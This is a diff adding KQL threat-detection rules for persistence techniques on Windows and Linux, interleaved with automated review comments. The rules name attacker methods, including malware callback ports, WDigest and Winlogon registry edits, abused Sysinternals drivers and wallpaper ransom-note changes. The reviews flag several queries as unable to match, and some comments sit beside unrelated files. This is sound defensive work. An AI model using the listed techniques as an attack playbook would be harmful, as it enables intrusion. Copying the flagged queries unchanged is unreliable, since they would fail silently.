+// Description: Detects the execution of "reg.exe" to alter registry keys that would replace the user's desktop background.
+This is a common technique used by malware to change the desktop background to a ransom note or other image.
+
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.impact, attack.t1112, attack.t1491.001
+// False Positives:
+// - Administrative scripts that change the desktop background to a company logo or other image.
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "add" and (FolderPath endswith "\\reg.exe" or ProcessVersionInfoOriginalFileName =~ "reg.exe")) and (ProcessCommandLine contains "Control Panel\\Desktop" or ProcessCommandLine contains "CurrentVersion\\Policies\\ActiveDesktop" or ProcessCommandLine contains "CurrentVersion\\Policies\\System") and ((ProcessCommandLine contains "/v NoChangingWallpaper" and ProcessCommandLine contains "/d 1") or (ProcessCommandLine contains "/v Wallpaper" and ProcessCommandLine contains "/t REG_SZ") or (ProcessCommandLine contains "/v WallpaperStyle" and ProcessCommandLine contains "/d 2"))
\ No newline at end of file
diff --git a/KQL/rules/Persistence/potentially_suspicious_desktop_background_change_via_registry.kql b/KQL/rules/Persistence/potentially_suspicious_desktop_background_change_via_registry.kql
new file mode 100644
index 00000000..3620513c
--- /dev/null
+++ b/KQL/rules/Persistence/potentially_suspicious_desktop_background_change_via_registry.kql
@@ -0,0 +1,14 @@
+// Title: Potentially Suspicious Desktop Background Change Via Registry
+// Author: Nasreddine Bencherchali (Nextron Systems), Stephen Lincoln @slincoln-aiq (AttackIQ)
+// Date: 2023-12-21
+// Level: medium
+// Description: Detects registry value settings that would replace the user's desktop background.
+This is a common technique used by malware to change the desktop background to a ransom note or other image.
+
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.impact, attack.t1112, attack.t1491.001
+// False Positives:
+// - Administrative scripts that change the desktop background to a company logo or other image.
+
+DeviceRegistryEvents
+| where (RegistryKey contains "Control Panel\\Desktop" or RegistryKey contains "CurrentVersion\\Policies\\ActiveDesktop" or RegistryKey contains "CurrentVersion\\Policies\\System") and ((RegistryValueData =~ "DWORD (0x00000001)" and RegistryKey endswith "NoChangingWallpaper") or RegistryKey endswith "\\Wallpaper" or (RegistryValueData =~ "2" and RegistryKey endswith "\\WallpaperStyle")) and (not(((RegistryValueData =~ "(Empty)" and RegistryKey endswith "\\Control Panel\\Desktop\\Wallpaper") or InitiatingProcessFolderPath endswith "C:\\Windows\\Explorer.EXE" or InitiatingProcessFolderPath endswith "\\svchost.exe"))) and (not(((InitiatingProcessFolderPath in~ ("C:\\Program Files\\Amazon\\EC2Launch\\EC2Launch.exe", "C:\\Program Files (x86)\\Amazon\\EC2Launch\\EC2Launch.exe")) and RegistryKey endswith "\\Control Panel\\Desktop\\Wallpaper")))
\ No newline at end of file
diff --git a/KQL/rules/Persistence/potentially_suspicious_malware_callback_communication.kql b/KQL/rules/Persistence/potentially_suspicious_malware_callback_communication.kql
new file mode 100644
index 00000000..613c08f2
--- /dev/null
+++ b/KQL/rules/Persistence/potentially_suspicious_malware_callback_communication.kql
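Review bot: `RegistryValueData =~ "DWORD (0x00000001)"` and `RegistryValueData =~ "(Empty)"` are the Sysmon `Details` rendering of a value, carried over unchanged; in `DeviceRegistryEvents` the data column holds the raw value as a string (a DWORD of 1 appears as `1`, with the type in `RegistryValueType`), so the `NoChangingWallpaper` branch and the empty-wallpaper exclusion never match as written. Change the first to `RegistryValueData == "1"` and the exclusion to `isempty(RegistryValueData)`, and confirm the empty representation against live data since it is not shown here. The `=~ "2"` comparison for `WallpaperStyle` is already in the raw form, which suggests the converter handles some but not all Sysmon-specific literals.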
@@ -0,0 +1,11 @@
+// Title: Potentially Suspicious Malware Callback Communication
+// Author: Florian Roth (Nextron Systems)
+// Date: 2017-03-19
+// Level: high
+// Description: Detects programs that connect to known malware callback ports based on statistical analysis from two different sandbox system databases
+
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.command-and-control, attack.t1571
+
+DeviceNetworkEvents
+| where (RemotePort in~ ("100", "198", "200", "243", "473", "666", "700", "743", "777", "1443", "1515", "1777", "1817", "1904", "1960", "2443", "2448", "3360", "3675", "3939", "4040", "4433", "4438", "4443", "4444", "4455", "5445", "5552", "5649", "6625", "7210", "7777", "8143", "8843", "9631", "9943", "10101", "12102", "12103", "12322", "13145", "13394", "13504", "13505", "13506", "13507", "14102", "14103", "14154", "49180", "65520", "65535")) and (not((ipv4_is_in_range(RemoteIP, "127.0.0.0/8") or ipv4_is_in_range(RemoteIP, "10.0.0.0/8") or ipv4_is_in_range(RemoteIP, "172.16.0.0/12") or ipv4_is_in_range(RemoteIP, "192.168.0.0/16") or ipv4_is_in_range(RemoteIP, "169.254.0.0/16") or ipv4_is_in_range(RemoteIP, "::1/128") or ipv4_is_in_range(RemoteIP, "fe80::/10") or ipv4_is_in_range(RemoteIP, "fc00::/7")))) and (not((InitiatingProcessFolderPath startswith "C:\\Program Files\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\")))
\ No newline at end of file
diff --git a/KQL/rules/Persistence/potentially_suspicious_malware_callback_communication_linux.kql b/KQL/rules/Persistence/potentially_suspicious_malware_callback_communication_linux.kql
new file mode 100644
index 00000000..88a88ae5
--- /dev/null
+++ b/KQL/rules/Persistence/potentially_suspicious_malware_callback_communication_linux.kql
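Review bot: `RemotePort in~ ("100", "198", ...)` applies a case-insensitive string operator to `RemotePort`, which is a numeric column in `DeviceNetworkEvents`; at best this relies on implicit coercion and at worst it is a semantic error, so the port list should be `RemotePort in (100, 198, 200, ...)` with integer literals. The private-range exclusion also hands IPv6 prefixes (`::1/128`, `fe80::/10`, `fc00::/7`) to `ipv4_is_in_range()`, which only understands IPv4 and yields null for them, so IPv6 loopback and link-local connections are not excluded; those three terms need `ipv6_is_in_range(RemoteIP, ...)`. The Linux variant in the next hunk has both issues.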
@@ -0,0 +1,11 @@
+// Title: Potentially Suspicious Malware Callback Communication - Linux
+// Author: hasselj
+// Date: 2024-05-10
+// Level: high
+// Description: Detects programs that connect to known malware callback ports based on threat intelligence reports.
+
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.command-and-control, attack.t1571
+
+DeviceNetworkEvents
+| where (RemotePort in~ ("888", "999", "2200", "2222", "4000", "4444", "6789", "8531", "50501", "51820")) and (not((ipv4_is_in_range(RemoteIP, "127.0.0.0/8") or ipv4_is_in_range(RemoteIP, "10.0.0.0/8") or ipv4_is_in_range(RemoteIP, "172.16.0.0/12") or ipv4_is_in_range(RemoteIP, "192.168.0.0/16") or ipv4_is_in_range(RemoteIP, "169.254.0.0/16") or ipv4_is_in_range(RemoteIP, "::1/128") or ipv4_is_in_range(RemoteIP, "fe80::/10") or ipv4_is_in_range(RemoteIP, "fc00::/7"))))
\ No newline at end of file
diff --git a/KQL/rules/Persistence/potentially_suspicious_shell_script_creation_in_profile_folder.kql b/KQL/rules/Persistence/potentially_suspicious_shell_script_creation_in_profile_folder.kql
new file mode 100644
index 00000000..354f302d
--- /dev/null
+++ b/KQL/rules/Persistence/potentially_suspicious_shell_script_creation_in_profile_folder.kql
@@ -0,0 +1,13 @@
+// Title: Potentially Suspicious Shell Script Creation in Profile Folder
+// Author: Joseliyo Sanchez, @Joseliyo_Jstnk
+// Date: 2023-06-02
+// Level: low
+// Description: Detects the creation of shell scripts under the "profile.d" path.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence
+// False Positives:
+// - Legitimate shell scripts in the "profile.d" directory could be common in your environment. Apply additional filter accordingly via "image", by adding specific filenames you "trust" or by correlating it with other events.
+// - Regular file creation during system update or software installation by the package manager
+
+DeviceFileEvents
+| where FolderPath contains "/etc/profile.d/" and (FolderPath endswith ".csh" or FolderPath endswith ".sh")
\ No newline at end of file
diff --git a/KQL/rules/Persistence/powershell_module_file_created.kql b/KQL/rules/Persistence/powershell_module_file_created.kql
new file mode 100644
index 00000000..9c246782
--- /dev/null
+++ b/KQL/rules/Persistence/powershell_module_file_created.kql
@@ -0,0 +1,12 @@
+// Title: PowerShell Module File Created
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-05-09
+// Level: low
+// Description: Detects the creation of a new PowerShell module ".psm1", ".psd1", ".dll", ".ps1", etc.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence
+// False Positives:
+// - Likely
+
+DeviceFileEvents
+| where (InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe") and (FolderPath contains "\\WindowsPowerShell\\Modules\\" or FolderPath contains "\\PowerShell\\7\\Modules\\")
\ No newline at end of file
diff --git a/KQL/rules/Persistence/powershell_module_file_created_by_non_powershell_process.kql b/KQL/rules/Persistence/powershell_module_file_created_by_non_powershell_process.kql
new file mode 100644
index 00000000..5c33c3aa
--- /dev/null
+++ b/KQL/rules/Persistence/powershell_module_file_created_by_non_powershell_process.kql
@@ -0,0 +1,10 @@
+// Title: PowerShell Module File Created By Non-PowerShell Process
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-05-09
+// Level: medium
+// Description: Detects the creation of a new PowerShell module ".psm1", ".psd1", ".dll", ".ps1", etc. by a non-PowerShell process
+// MITRE Tactic: Persistence
+// Tags: attack.persistence
+
+DeviceFileEvents
+| where (FolderPath contains "\\WindowsPowerShell\\Modules\\" or FolderPath contains "\\PowerShell\\7\\Modules\\") and (not(((InitiatingProcessFolderPath in~ ("C:\\Windows\\System32\\msiexec.exe", "C:\\Windows\\SysWOW64\\msiexec.exe")) or (InitiatingProcessFolderPath endswith ":\\Program Files\\PowerShell\\7-preview\\pwsh.exe" or InitiatingProcessFolderPath endswith ":\\Program Files\\PowerShell\\7\\pwsh.exe" or InitiatingProcessFolderPath endswith ":\\Windows\\System32\\poqexec.exe" or InitiatingProcessFolderPath endswith ":\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell_ise.exe" or InitiatingProcessFolderPath endswith ":\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" or InitiatingProcessFolderPath endswith ":\\Windows\\SysWOW64\\poqexec.exe" or InitiatingProcessFolderPath endswith ":\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell_ise.exe" or InitiatingProcessFolderPath endswith ":\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe"))))
\ No newline at end of file
diff --git a/KQL/rules/Persistence/powershell_profile_modification.kql b/KQL/rules/Persistence/powershell_profile_modification.kql
new file mode 100644
index 00000000..42f5f1c1
--- /dev/null
+++ b/KQL/rules/Persistence/powershell_profile_modification.kql
@@ -0,0 +1,12 @@
+// Title: PowerShell Profile Modification
+// Author: HieuTT35, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2019-10-24
+// Level: medium
+// Description: Detects the creation or modification of a powershell profile which could indicate suspicious activity as the profile can be used as a mean of persistence
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.privilege-escalation, attack.t1546.013
+// False Positives:
+// - System administrator creating Powershell profile manually
+
+DeviceFileEvents
+| where FolderPath endswith "\\Microsoft.PowerShell_profile.ps1" or FolderPath endswith "\\PowerShell\\profile.ps1" or FolderPath endswith "\\Program Files\\PowerShell\\7-preview\\profile.ps1" or FolderPath endswith "\\Program Files\\PowerShell\\7\\profile.ps1" or FolderPath endswith "\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1" or FolderPath endswith "\\WindowsPowerShell\\profile.ps1"
\ No newline at end of file
diff --git a/KQL/rules/Persistence/powershell_script_dropped_via_powershell_exe.kql b/KQL/rules/Persistence/powershell_script_dropped_via_powershell_exe.kql
new file mode 100644
index 00000000..e12598f0
--- /dev/null
+++ b/KQL/rules/Persistence/powershell_script_dropped_via_powershell_exe.kql
@@ -0,0 +1,12 @@
+// Title: PowerShell Script Dropped Via PowerShell.EXE
+// Author: frack113
+// Date: 2023-05-09
+// Level: low
+// Description: Detects PowerShell creating a PowerShell file (.ps1). While often times this behavior is benign, sometimes it can be a sign of a dropper script trying to achieve persistence.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence
+// False Positives:
+// - False positives will differ depending on the environment and scripts used. Apply additional filters accordingly.
+
+DeviceFileEvents
+| where ((InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe") and FolderPath endswith ".ps1") and (not(((FolderPath contains "\\AppData\\Local\\Temp\\" and FolderPath startswith "C:\\Users\\") or FolderPath contains "__PSScriptPolicyTest_" or FolderPath startswith "C:\\Windows\\Temp\\")))
\ No newline at end of file
diff --git a/KQL/rules/Persistence/process_explorer_driver_creation_by_non_sysinternals_binary.kql b/KQL/rules/Persistence/process_explorer_driver_creation_by_non_sysinternals_binary.kql
new file mode 100644
index 00000000..a69d2037
--- /dev/null
+++ b/KQL/rules/Persistence/process_explorer_driver_creation_by_non_sysinternals_binary.kql
@@ -0,0 +1,14 @@
+// Title: Process Explorer Driver Creation By Non-Sysinternals Binary
+// Author: Florian Roth (Nextron Systems)
+// Date: 2023-05-05
+// Level: high
+// Description: Detects creation of the Process Explorer drivers by processes other than Process Explorer (procexp) itself.
+Hack tools or malware may use the Process Explorer driver to elevate privileges, drops it to disk for a few moments, runs a service using that driver and removes it afterwards.
+
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.privilege-escalation, attack.t1068
+// False Positives:
+// - Some false positives may occur with legitimate renamed process explorer binaries
+
+DeviceFileEvents
+| where (FolderPath contains "\\PROCEXP" and FolderPath endswith ".sys") and (not((InitiatingProcessFolderPath endswith "\\procexp.exe" or InitiatingProcessFolderPath endswith "\\procexp64.exe")))
\ No newline at end of file
diff --git a/KQL/rules/Persistence/process_monitor_driver_creation_by_non_sysinternals_binary.kql b/KQL/rules/Persistence/process_monitor_driver_creation_by_non_sysinternals_binary.kql
new file mode 100644
index 00000000..12cfd2b6
--- /dev/null
+++ b/KQL/rules/Persistence/process_monitor_driver_creation_by_non_sysinternals_binary.kql
@@ -0,0 +1,12 @@
+// Title: Process Monitor Driver Creation By Non-Sysinternals Binary
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-05-05
+// Level: medium
+// Description: Detects creation of the Process Monitor driver by processes other than Process Monitor (procmon) itself.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.privilege-escalation, attack.t1068
+// False Positives:
+// - Some false positives may occur with legitimate renamed process monitor binaries
+
+DeviceFileEvents
+| where (FolderPath contains "\\procmon" and FolderPath endswith ".sys") and (not((InitiatingProcessFolderPath endswith "\\procmon.exe" or InitiatingProcessFolderPath endswith "\\procmon64.exe")))
\ No newline at end of file
diff --git a/KQL/rules/Persistence/pua_system_informer_execution.kql b/KQL/rules/Persistence/pua_system_informer_execution.kql
new file mode 100644
index 00000000..47ec5b70
--- /dev/null
+++ b/KQL/rules/Persistence/pua_system_informer_execution.kql
@@ -0,0 +1,12 @@
+// Title: PUA - System Informer Execution
+// Author: Florian Roth (Nextron Systems)
+// Date: 2023-05-08
+// Level: medium
+// Description: Detects the execution of System Informer, a task manager tool to view and manipulate processes, kernel options and other low level operations
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.privilege-escalation, attack.discovery, attack.defense-evasion, attack.t1082, attack.t1564, attack.t1543
+// False Positives:
+// - System Informer is regularly used legitimately by system administrators or developers. Apply additional filters accordingly
+
+DeviceProcessEvents
+| where FolderPath endswith "\\SystemInformer.exe" or ProcessVersionInfoOriginalFileName =~ "SystemInformer.exe" or ProcessVersionInfoFileDescription =~ "System Informer" or ProcessVersionInfoProductName =~ "System Informer" or (MD5 startswith "19426363A37C03C3ED6FEDF57B6696EC" or SHA1 startswith "8B12C6DA8FAC0D5E8AB999C31E5EA04AF32D53DC" or SHA256 startswith "8EE9D84DE50803545937A63C686822388A3338497CDDB660D5D69CF68B68F287")
\ No newline at end of file
diff --git a/KQL/rules/Persistence/redmimicry_winnti_playbook_registry_manipulation.kql b/KQL/rules/Persistence/redmimicry_winnti_playbook_registry_manipulation.kql
new file mode 100644
index 00000000..b3972ec5
--- /dev/null
+++ b/KQL/rules/Persistence/redmimicry_winnti_playbook_registry_manipulation.kql
@@ -0,0 +1,10 @@
+// Title: RedMimicry Winnti Playbook Registry Manipulation
+// Author: Alexander Rausch
+// Date: 2020-06-24
+// Level: high
+// Description: Detects actions caused by the RedMimicry Winnti playbook
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.t1112
+
+DeviceRegistryEvents
+| where RegistryKey contains "HKLM\\SOFTWARE\\Microsoft\\HTMLHelp\\data"
\ No newline at end of file
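Review bot: The hash clause uses `MD5 startswith`, `SHA1 startswith` and `SHA256 startswith` with full-length digests, which reads as a prefix match but is effectively an equality test on these columns; `MD5 =~ "19426363A37C03C3ED6FEDF57B6696EC"` (or `in~` once more hashes are added) states the intent and stops a reader wondering whether a truncated hash was meant. The three digests also pin a single release, so the False Positives block could note that the hash branch only catches a renamed or version-stripped copy of that build and will not follow newer System Informer versions.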
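Review bot: `RegistryKey contains "HKLM\\SOFTWARE\\Microsoft\\HTMLHelp\\data"` will not match in Advanced Hunting, where `DeviceRegistryEvents.RegistryKey` is reported with the long hive name (`HKEY_LOCAL_MACHINE\\…`); the `HKLM` short form looks like the Sigma source leaking through unconverted. Use the hive-agnostic `RegistryKey contains "\\SOFTWARE\\Microsoft\\HTMLHelp\\data"` or spell out `HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\HTMLHelp\\data`. Worth grepping the rest of the patch for other `HKLM\\` / `HKCU\\` prefixes, since a `high`-level rule that can never fire is worse than no rule.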
diff --git a/KQL/rules/Persistence/reg_add_suspicious_paths.kql b/KQL/rules/Persistence/reg_add_suspicious_paths.kql
new file mode 100644
index 00000000..de19f182
--- /dev/null
+++ b/KQL/rules/Persistence/reg_add_suspicious_paths.kql
@@ -0,0 +1,12 @@
+// Title: Reg Add Suspicious Paths
+// Author: frack113, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-08-19
+// Level: high
+// Description: Detects when an adversary uses the reg.exe utility to add or modify new keys or subkeys
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.t1112, attack.t1562.001
+// False Positives:
+// - Rare legitimate add to registry via cli (to these locations)
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "\\AppDataLow\\Software\\Microsoft\\" or ProcessCommandLine contains "\\Policies\\Microsoft\\Windows\\OOBE" or ProcessCommandLine contains "\\Policies\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon" or ProcessCommandLine contains "\\SOFTWARE\\Microsoft\\Windows NT\\Currentversion\\Winlogon" or ProcessCommandLine contains "\\CurrentControlSet\\Control\\SecurityProviders\\WDigest" or ProcessCommandLine contains "\\Microsoft\\Windows Defender\\") and (FolderPath endswith "\\reg.exe" or ProcessVersionInfoOriginalFileName =~ "reg.exe")
\ No newline at end of file
diff --git a/KQL/rules/Persistence/register_new_ifiltre_for_persistence.kql b/KQL/rules/Persistence/register_new_ifiltre_for_persistence.kql
new file mode 100644
index 00000000..7b51cf2f
--- /dev/null
+++ b/KQL/rules/Persistence/register_new_ifiltre_for_persistence.kql
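Review bot: The title and description speak of `reg.exe` adding or modifying keys, but the `| where` clause only requires one of the listed paths to appear somewhere in `ProcessCommandLine` next to `reg.exe`, so `reg query` or `reg export` against `…\\Winlogon` or `…\\Windows Defender\\` trigger it as well. If that breadth is intentional (the Sigma source may well have the same shape), say so in the header, e.g. `// - reg query / export against these paths also match; the rule is not restricted to the add verb`; otherwise add `and ProcessCommandLine contains " add "` so the query matches its name. At level `high`, over-matching on reads will be noticed quickly either way.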
@@ -0,0 +1,14 @@
+// Title: Register New IFiltre For Persistence
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-07-21
+// Level: medium
+// Description: Detects when an attacker registers a new IFilter for an extension. Microsoft Windows Search uses filters to extract the content of items for inclusion in a full-text index.
+You can extend Windows Search to index new or proprietary file types by writing filters to extract the content, and property handlers to extract the properties of files.
+
+// MITRE Tactic: Persistence
+// Tags: attack.persistence
+// False Positives:
+// - Legitimate registration of IFilters by the OS or software
+
+DeviceRegistryEvents
+| where ((RegistryKey contains "\\SOFTWARE\\Classes\\CLSID" and RegistryKey contains "\\PersistentAddinsRegistered\\{89BCB740-6119-101A-BCB7-00DD010655AF}") or (RegistryKey contains "\\SOFTWARE\\Classes\\." and RegistryKey contains "\\PersistentHandler")) and (not(((RegistryKey endswith "\\CLSID\\{4F46F75F-199F-4C63-8B7D-86D48FE7970C}*" or RegistryKey endswith "\\CLSID\\{4887767F-7ADC-4983-B576-88FB643D6F79}*" or RegistryKey endswith "\\CLSID\\{D3B41FA1-01E3-49AF-AA25-1D0D824275AE}*" or RegistryKey endswith "\\CLSID\\{72773E1A-B711-4d8d-81FA-B9A43B0650DD}*" or RegistryKey endswith "\\CLSID\\{098f2470-bae0-11cd-b579-08002b30bfeb}*" or RegistryKey endswith "\\CLSID\\{1AA9BF05-9A97-48c1-BA28-D9DCE795E93C}*" or RegistryKey endswith "\\CLSID\\{2e2294a9-50d7-4fe7-a09f-e6492e185884}*" or RegistryKey endswith "\\CLSID\\{34CEAC8D-CBC0-4f77-B7B1-8A60CB6DA0F7}*" or RegistryKey endswith "\\CLSID\\{3B224B11-9363-407e-850F-C9E1FFACD8FB}*" or RegistryKey endswith "\\CLSID\\{3DDEB7A4-8ABF-4D82-B9EE-E1F4552E95BE}*" or RegistryKey endswith "\\CLSID\\{5645C8C1-E277-11CF-8FDA-00AA00A14F93}*" or RegistryKey endswith "\\CLSID\\{5645C8C4-E277-11CF-8FDA-00AA00A14F93}*" or RegistryKey endswith "\\CLSID\\{58A9EBF6-5755-4554-A67E-A2467AD1447B}*" or RegistryKey endswith 
"\\CLSID\\{5e941d80-bf96-11cd-b579-08002b30bfeb}*" or RegistryKey endswith "\\CLSID\\{698A4FFC-63A3-4E70-8F00-376AD29363FB}*" or RegistryKey endswith "\\CLSID\\{7E9D8D44-6926-426F-AA2B-217A819A5CCE}*" or RegistryKey endswith "\\CLSID\\{8CD34779-9F10-4f9b-ADFB-B3FAEABDAB5A}*" or RegistryKey endswith "\\CLSID\\{9694E38A-E081-46ac-99A0-8743C909ACB6}*" or RegistryKey endswith "\\CLSID\\{98de59a0-d175-11cd-a7bd-00006b827d94}*" or RegistryKey endswith "\\CLSID\\{AA10385A-F5AA-4EFF-B3DF-71B701E25E18}*" or RegistryKey endswith "\\CLSID\\{B4132098-7A03-423D-9463-163CB07C151F}*" or RegistryKey endswith "\\CLSID\\{d044309b-5da6-4633-b085-4ed02522e5a5}*" or RegistryKey endswith "\\CLSID\\{D169C14A-5148-4322-92C8-754FC9D018D8}*" or RegistryKey endswith "\\CLSID\\{DD75716E-B42E-4978-BB60-1497B92E30C4}*" or RegistryKey endswith "\\CLSID\\{E2F83EED-62DE-4A9F-9CD0-A1D40DCD13B6}*" or RegistryKey endswith "\\CLSID\\{E772CEB3-E203-4828-ADF1-765713D981B8}*" or RegistryKey contains "\\CLSID\\{eec97550-47a9-11cf-b952-00aa0051fe20}" or RegistryKey endswith "\\CLSID\\{FB10BD80-A331-4e9e-9EB7-00279903AD99}*") or (InitiatingProcessFolderPath startswith "C:\\Windows\\System32\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\")))) \ No newline at end of file diff --git a/KQL/rules/Persistence/registry_explorer_policy_modification.kql b/KQL/rules/Persistence/registry_explorer_policy_modification.kql new file mode 100644 index 00000000..a14b0226 --- /dev/null +++ b/KQL/rules/Persistence/registry_explorer_policy_modification.kql 
@@ -0,0 +1,12 @@
+// Title: Registry Explorer Policy Modification
+// Author: frack113
+// Date: 2022-03-18
+// Level: medium
+// Description: Detects registry modifications that disable internal tools or functions in explorer (malware like Agent Tesla uses this technique)
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.t1112
+// False Positives:
+// - Legitimate admin script
+
+DeviceRegistryEvents
+| where RegistryValueData =~ "DWORD (0x00000001)" and (RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoLogOff" or RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoDesktop" or RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoRun" or RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoFind" or RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoControlPanel" or RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoFileMenu" or RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoClose" or RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoSetTaskbar" or RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoPropertiesMyDocuments" or RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoTrayContextMenu")
\ No newline at end of file
diff --git a/KQL/rules/Persistence/registry_hide_function_from_user.kql b/KQL/rules/Persistence/registry_hide_function_from_user.kql
new file mode 100644
index 00000000..0820c432
--- /dev/null
+++ b/KQL/rules/Persistence/registry_hide_function_from_user.kql
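Review bot: Neither half of the `| where` clause can match MDE data as written: `DeviceRegistryEvents` reports the value name in `RegistryValueName` rather than appended to `RegistryKey`, so `RegistryKey endswith "…\\Policies\\Explorer\\NoLogOff"` never holds, and a REG_DWORD is surfaced as a plain decimal string (`1`), not the Sysmon rendering `DWORD (0x00000001)`. Both shapes are the Sigma/Sysmon source leaking through the conversion. The equivalent is `RegistryKey endswith "\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer" and RegistryValueName in~ ("NoLogOff", "NoDesktop", "NoRun", "NoFind", "NoControlPanel", "NoFileMenu", "NoClose", "NoSetTaskbar", "NoPropertiesMyDocuments", "NoTrayContextMenu") and RegistryValueData == "1"`, optionally with `RegistryValueType == "Dword"` to avoid a string value of "1" matching.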
@@ -0,0 +1,12 @@
+// Title: Registry Hide Function from User
+// Author: frack113
+// Date: 2022-03-18
+// Level: medium
+// Description: Detects registry modifications that hide internal tools or functions from the user (malware like Agent Tesla, Hermetic Wiper uses this technique)
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.t1112
+// False Positives:
+// - Legitimate admin script
+
+DeviceRegistryEvents
+| where (RegistryValueData =~ "DWORD (0x00000000)" and (RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\ShowInfoTip" or RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\ShowCompColor")) or (RegistryValueData =~ "DWORD (0x00000001)" and (RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\HideClock" or RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\HideSCAHealth" or RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\HideSCANetwork" or RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\HideSCAPower" or RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\HideSCAVolume"))
\ No newline at end of file
diff --git a/KQL/rules/Persistence/registry_manipulation_via_wmi_stdregprov.kql b/KQL/rules/Persistence/registry_manipulation_via_wmi_stdregprov.kql
new file mode 100644
index 00000000..1f0aaf0a
--- /dev/null
+++ b/KQL/rules/Persistence/registry_manipulation_via_wmi_stdregprov.kql
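Review bot: Both branches of the `| where` clause compare `RegistryKey` against paths that end in a value name (`…\\Advanced\\ShowInfoTip`, `…\\Policies\\Explorer\\HideClock`) and `RegistryValueData` against the Sysmon rendering `DWORD (0x0000000N)`; in `DeviceRegistryEvents` the value name is in `RegistryValueName` and DWORD data is a decimal string, so this rule cannot fire. Rewrite as `(RegistryKey endswith "\\CurrentVersion\\Explorer\\Advanced" and RegistryValueName in~ ("ShowInfoTip", "ShowCompColor") and RegistryValueData == "0") or (RegistryKey endswith "\\CurrentVersion\\Policies\\Explorer" and RegistryValueName in~ ("HideClock", "HideSCAHealth", "HideSCANetwork", "HideSCAPower", "HideSCAVolume") and RegistryValueData == "1")`. The same Sysmon-to-MDE field mismatch recurs across the registry rules in this patch, so it is most likely a mapping gap in the converter rather than something to patch file by file.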
@@ -0,0 +1,15 @@
+// Title: Registry Manipulation via WMI Stdregprov
+// Author: Daniel Koifman (KoifSec)
+// Date: 2025-07-30
+// Level: medium
+// Description: Detects the usage of wmic.exe to manipulate Windows registry via the WMI StdRegProv class.
+This behaviour could be potentially suspicious because it uses an alternative method to modify registry keys instead of legitimate registry tools like reg.exe or regedit.exe.
+Attackers specifically choose this technique to evade detection and bypass security monitoring focused on traditional registry modification commands.
+
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.execution, attack.defense-evasion, attack.discovery, attack.t1047, attack.t1112, attack.t1012
+// False Positives:
+// - Legitimate administrative activity
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "call" and ProcessCommandLine contains "stdregprov") and (FolderPath endswith "\\wmic.exe" or ProcessVersionInfoOriginalFileName =~ "wmic.exe")
\ No newline at end of file
diff --git a/KQL/rules/Persistence/registry_modification_to_hidden_file_extension.kql b/KQL/rules/Persistence/registry_modification_to_hidden_file_extension.kql
new file mode 100644
index 00000000..ba5213dd
--- /dev/null
